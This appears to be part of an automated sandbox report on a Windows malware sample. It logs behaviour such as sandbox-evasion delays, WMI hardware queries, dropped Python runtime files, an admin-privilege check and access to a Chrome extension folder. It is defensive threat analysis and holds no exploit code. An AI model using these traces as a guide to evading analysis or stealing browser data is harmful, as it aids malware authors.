              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4083Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3541Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3324
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 848
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2954
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 597
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3837
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 825
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4659
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3229
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2760
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 998
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-16942
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeAPI coverage: 4.9 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276Thread sleep count: 4083 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304Thread sleep count: 3541 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292Thread sleep count: 3324 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep count: 848 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep count: 3837 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288Thread sleep count: 825 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 4659 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 304 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724Thread sleep count: 3229 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440Thread sleep count: 152 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep count: 2760 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820Thread sleep count: 998 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF73AE27E4C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF73AE27E4C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose,0_2_00007FF73AE188D0
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF73AE31EE4
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,68_2_00007FF7F7EA46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7EE88E0 FindFirstFileExA,68_2_00007FF7F7EE88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exeCode function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,68_2_00007FF7F7E9E21C
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeCode function: 2_2_00007FF8A86F1490 GetSystemInfo,2_2_00007FF8A86F1490
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
